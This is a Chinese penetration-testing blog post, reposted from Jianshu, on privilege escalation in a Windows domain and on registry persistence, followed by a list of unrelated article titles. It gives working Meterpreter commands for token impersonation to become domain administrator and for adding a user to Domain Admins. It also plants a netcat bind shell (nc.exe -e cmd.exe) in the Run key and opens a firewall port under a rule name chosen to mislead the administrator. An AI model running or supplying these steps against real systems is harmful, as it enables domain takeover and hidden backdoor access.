域环境提权、编辑注册表
来源:互联网 发布:淘宝书城 编辑:程序博客网 时间:2024/06/06 19:12
Token(令牌),域环境中提权
用户每次登录时,账号绑定临时的token;
访问资源时提交token进行身份验证,类似于web cookie。
Delegate Token:交互会话登录,(例如直接登录、远程桌面登录)
Impersonate Token:非交互登录,(例如访问文件共享)
注意:在域环境中,Delegate Token账号注销后变成Impersonate Token,权限依然有效。所以攻击者一旦获取域管理员的token后,危害极大!
实例:server 2003是域控制器,XP加入到域。
首先使用ms08-067漏洞,获得XP的system权限;
然后在域控制器上访问XP的文件共享(\\192.168.80.44\c$),建立一个administrator用户的Impersonate Token;
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token LAB\\Administrator 将自己伪装成LAB Administrator用户 (注意命令中是两个\)
meterpreter > getuid 发现自己现在是域管理员
Server username: LAB\Administrator
meterpreter > execute -f cmd.exe -i -t 获得交互shell,-t(使用当前假冒的token执行程序)
C:\WINDOWS\system32>ipconfig /all 查看XP的DNS服务器,即域控制器的ip地址
meterpreter > add_user coleradmin Coleradmin1! -h 192.168.80.11 添加用户
meterpreter > add_group_user "Domain Admins" coleradmin -h 192.168.80.11 给予域管理员权限
编辑注册表
注册表的渗透测试中的常见用途:修改、添加启动项;窃取存储在注册表中的机密信息;绕过文件型病毒查杀。
实例:编辑注册表,添加nc到系统启动项中,形成后门程序。
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 将nc.exe上传到目标主机
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run 枚举注册表的键值
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe' 在当前主键下增加一个nc键值
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc 查看nc键值
在重启之前,首先要设置防火墙允许444端口通过。
meterpreter > execute -f cmd -i -H 最好加上-H参数,不然在目标主机上会弹出cmd窗口
C:\Windows\System32> netsh firewall show opmode 查看防火墙的状态
C:\Windows\System32>netsh firewall add portopening TCP 444 "网络发现(Pub PSD-Out)" ENABLE ALL 添加防火墙的规则允许444端口通过(这里“网络发现(Pub PSD-Out)”是规则名称,这样写是为了迷惑管理员。)
目标主机重启后,在Kali上使用nc连接它,获得shell。
root@kali:~# nc 192.168.80.33 444
作者:Instu
链接:http://www.jianshu.com/p/906832a08a46
來源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
- 域环境提权、编辑注册表
- 注册表编辑
- 编辑注册表函数
- wince 注册表编辑
- Win32注册表编辑类
- c++注册表编辑
- c# 注册表编辑
- 常用注册表编辑
- C++编辑注册表
- 制作REG文件编辑注册表
- Reg注册表内容编辑操作
- 用记事本编辑注册表文件
- 禁用开启注册表编辑功能
- 什么是注册表 ,注册表编辑手册之大集合
- WinCE下的注册表编辑程序
- JS和INF编辑注册表(图)
- 应用程序中对注册表的编辑
- 如何手工写.reg编辑注册表文件
- VBS中Run和Exec的区别
- js基础-DOM-属性和CSS
- static final 基础(一)
- 签到界面总结
- 循环创建btn+使用imageEdgeInsets约束+设置图片大小
- 域环境提权、编辑注册表
- 56. Merge Intervals
- Java 设计模式之动态代理、静态代理
- Android Butter Knife使用
- 根分区和根目录
- LinkedBlockingQueue的put,add跟offer的区别
- 搭建Webmin服务器管理系统
- NativeXml:读取
- string/tostring/string.valueof的区别